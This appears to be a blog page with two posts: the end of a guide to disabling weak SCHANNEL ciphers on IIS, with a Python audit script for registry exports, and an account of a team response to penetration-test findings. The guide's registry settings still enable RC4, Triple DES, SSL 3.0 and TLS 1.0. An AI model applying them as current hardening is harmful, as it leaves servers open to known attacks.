"Enabled"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC2 56/128]
"Enabled"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC4 128/128]
"Enabled"=dword:ffffffff
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC4 40/128]
"Enabled"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC4 56/128]
"Enabled"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC4 64/128]
"Enabled"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\Triple DES 168/168]
"Enabled"=dword:ffffffff


This time we are explicitly turning off the ciphers identified in the network vulnerability report, leaving only the strong ones switched on.
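Because SCHANNEL settings are scattered over many keys, it helps to audit an export rather than eyeball it. The Python below is an added example, not code from the post: it parses .reg text like the two fragments above (the sample is constructed from the post's keys) and lists every protocol or cipher that is still enabled but has since been deprecated. The post's fix leaves SSL 3.0, TLS 1.0 and RC4 128/128 on, which was reasonable for 2009; since then SSL 3.0 (POODLE, 2014), RC4 (RFC 7465) and TLS 1.0 (RFC 8996) have all been withdrawn, so the script flags them. Keys that are absent take the OS default, which the parser does not model.

```python
import re
from typing import Dict, List, Tuple

# Constructed .reg text using the post's SCHANNEL keys (not an export from a real server).
SAMPLE_REG = r"""Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\PCT 1.0\Server]
"Enabled"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 2.0\Server]
"Enabled"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 3.0\Server]
"Enabled"=dword:ffffffff
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.0\Server]
"Enabled"=dword:ffffffff
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\NULL]
"Enabled"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\DES 56/56]
"Enabled"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC4 128/128]
"Enabled"=dword:ffffffff
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC4 40/128]
"Enabled"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\Triple DES 168/168]
"Enabled"=dword:ffffffff
"""

# Deprecated since the post: SSL 3.0 (POODLE, 2014), TLS 1.0 (RFC 8996), RC4 (RFC 7465),
# plus everything the post itself already turns off.
WEAK_PROTOCOLS = {"Multi-Protocol Unified Hello", "PCT 1.0", "SSL 2.0", "SSL 3.0", "TLS 1.0"}
WEAK_CIPHER_FAMILIES = {"NULL", "DES", "RC2", "RC4"}   # first word of the cipher key name

KEY_RE = re.compile(r"^\[.*\\SCHANNEL\\(Protocols|Ciphers)\\([^\]\\]+)(?:\\(Server|Client))?\]$")
VAL_RE = re.compile(r'^"Enabled"=dword:([0-9a-fA-F]{8})$')


def parse_schannel_reg(text: str) -> Dict[str, Dict[str, bool]]:
    """Return {"Protocols": {name: enabled}, "Ciphers": {name: enabled}} from .reg text."""
    state: Dict[str, Dict[str, bool]] = {"Protocols": {}, "Ciphers": {}}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        key = KEY_RE.match(line)
        if key:
            section, name, _side = key.groups()
            current = (section, name)
            continue
        val = VAL_RE.match(line)
        if val and current:
            # Windows treats any non-zero Enabled value as enabled, so ffffffff and 1 both count
            state[current[0]][current[1]] = int(val.group(1), 16) != 0
    return state


def weak_but_enabled(state: Dict[str, Dict[str, bool]]) -> List[Tuple[str, str]]:
    """Protocols and ciphers that are switched on but belong on the weak lists."""
    findings: List[Tuple[str, str]] = []
    for name, on in state["Protocols"].items():
        if on and name in WEAK_PROTOCOLS:
            findings.append(("protocol", name))
    for name, on in state["Ciphers"].items():
        if on and name.split(" ")[0] in WEAK_CIPHER_FAMILIES:
            findings.append(("cipher", name))
    return sorted(findings)


if __name__ == "__main__":
    for kind, name in weak_but_enabled(parse_schannel_reg(SAMPLE_REG)):
        print(f"{kind} still enabled: {name}")
```

On a live IIS box, `reg export` of the SCHANNEL key produces text in this format that the parser accepts unchanged.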

Running the http://www.serversniff.net/sslcheck.php report again shows a completely new picture:

image

NOTE: I do hope this post helps you out but please note that I do not accept any responsibility for your actions. This post details what worked for me, YMMV. Take care, Backup first, and don’t blame me if it goes pear shaped. As Microsoft Support says :

Important This post contains steps that tell you how to modify the registry. However, serious problems might occur if you modify the registry incorrectly. Therefore, make sure that you follow these steps carefully. For added protection, back up the registry before you modify it. Then, you can restore the registry if a problem occurs. For more information about how to back up and restore the registry, click the following article number to view the article in the Microsoft Knowledge Base:

322756 How to back up and restore the registry in Windows


http://geekswithblogs.net/dchristiansen/archive/2009/03/24/pcidss-disablessl2andweakciphersoniis6.aspx

http://msdn.microsoft.com/en-us/library/aa374757%28VS.85%29.aspx

http://support.microsoft.com/kb/245030/en-us

http://infocenter.sybase.com/help/index.jsp?topic=/com.sybase.help.ase_15.0.sag1/html/sag1/sag1884.htm


Tuesday, August 3, 2010

Resolving an incident ...

In a meeting, the technical director raised the following problem:

Recently, during the annual penetration test of our pricing system, several serious flaws were found in the identity authentication and account authorization mechanism. These security flaws were reported to the software vendor. However, after looking into them, they said they could not help, because the way it was deployed goes beyond their limits and recommendations. If we want their help, the mechanism has to be changed to follow the design they propose, and the cost of doing that would not be small. The biggest obstacle here is time, because next month the company has to launch a new product on the pricing system. The process of changing and testing this authentication and authorization mechanism needs at least two months and cannot be shortened in any way, because it requires adjusting the source code and redesigning the infrastructure tied to this mechanism.


After that meeting ended, the "Problem Manager" immediately called a second meeting to form what is called a "collaboration team". This team included representatives of every technical tier (network, security, middleware, DBA, midrange, developers, testers...). The team was created to hold a "white boarding session" (the group gathers in a meeting room with a whiteboard) and put forward every solution anyone could think of.

After a dozen or so "solutions" had been proposed, from the most absurd (because there was neither the time nor the money to carry them out) to the most feasible, all team members went through an assessment stage and scored each solution (on a scale of 1 to 10, say, with 1 being least feasible and 10 most feasible). The four highest-scoring solutions were picked out for an "argument" to settle on the two most feasible solutions, one short-term and one long-term (keep in mind, this group consisted entirely of people who thoroughly know their technical tiers, not amateurs).

Once the framework of the solution was in place, the team started implementing it right away. Because the team members had the authority to change and adjust things in their own technical areas, implementation at any tier happened quickly (instead of waiting to be implemented as in normal circumstances). Each such implementation was treated as going through one "iteration" (one round). His company applies "agile principles", so the whole process of discussion and implementation happened very fast. They even went into the meeting room, each with their own laptop, and made the changes right there on the spot (of course only on the test system, not on the live production system).

The Problem Manager was responsible for collecting the technical notes of each individual in the team to form the "action plan" for the production system later, and each individual was responsible for taking their own notes and writing the documentation specific to their area. Through each iteration, omissions or unfinished details had to be corrected until complete.

As a result, the solution was applied to the production system one week ahead of the deadline. The short-term solution chosen, the cheapest and fastest, was to replace the two IBM HTTP Server boxes running on AIX with two RHEL 5.x boxes running on 2 virtual machines (vmware), with Apache 2.2.x installed together with mod_security to apply filtering thanks to its "transformation" capability. The long-term solution was to recode the application to receive and strictly check the values of cookies / sessions before "signalling" the authentication / authorisation mechanism to allow access to continue. The technical details are fairly complex, because one application can have many "contexts" and each context points to a different system with different functions and information. For systems A, B, C, D.... all to be sure that user session X is valid, they have to communicate and verify with each other based on specific security conditions.

The point to make here is that the way each business organizes and handles a problem can differ. If the problem raised still is not fixed and the deadline for launching a new product cannot change (because it decides million-dollar wins or losses), then it has to be fixed by whatever means. If it is not fixed and some customer gets "caught", the product and that campaign are as good as ruined. The company's reputation also goes down the river and out to sea. Forming a "response" team to work dedicated and continuously for 3 weeks is no simple matter, because the cost is not small. However, if that cost is judged to be a small proportion of the (projected) revenue, there is no reason not to go ahead.